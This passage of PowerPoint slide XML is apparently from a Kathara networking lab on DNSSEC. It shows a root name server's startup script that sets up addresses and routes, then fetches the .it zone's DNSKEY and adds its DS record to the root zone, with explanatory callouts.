        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1314750"/>
            <a:ext cx="11159820" cy="4938154"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8219057E-F0BE-3B8B-7522-04472FE593AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="1681"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 10.0.3.5/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 110.0.0.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 210.0.3.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 100.0.75.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 200.1.1.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 195.0.10.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  while ! dig @10.0.3.10 it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @10.0.3.10 it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - it &gt;&gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3953DA1-4D2D-0029-B14D-4EA717D92D74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BECD97DC-C346-7FD1-9225-72E62A2A7D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BCA40BF-D897-B4B8-1554-BCF24FCA05AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0970D5B1-A6F4-6A6F-BA5D-44AA2D5DEEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9804E6-E8B8-18F8-5A3C-124B1781CE9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="2858984"/>
            <a:ext cx="3830316" cy="917369"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58873"/>
              <a:gd name="adj2" fmla="val 145799"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>queries the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> server (10.0.3.10) asking for its public keys (DNSKEY) for the it zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE50A43-950E-A99A-1DA8-11D86C544FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6825960" y="5155887"/>
            <a:ext cx="3830316" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -112509"/>
              <a:gd name="adj2" fmla="val -63714"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adds a blank line to the end of the root zone file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304982177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1108AF-61F6-0D0C-30E5-2AE714DBAA23}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E696BB71-4A4E-EF9D-24AF-526144204442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="2033534"/>
            <a:ext cx="7641005" cy="2790932"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03CE7F58-964C-8BFD-00B7-53506A27C0A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="831"/>
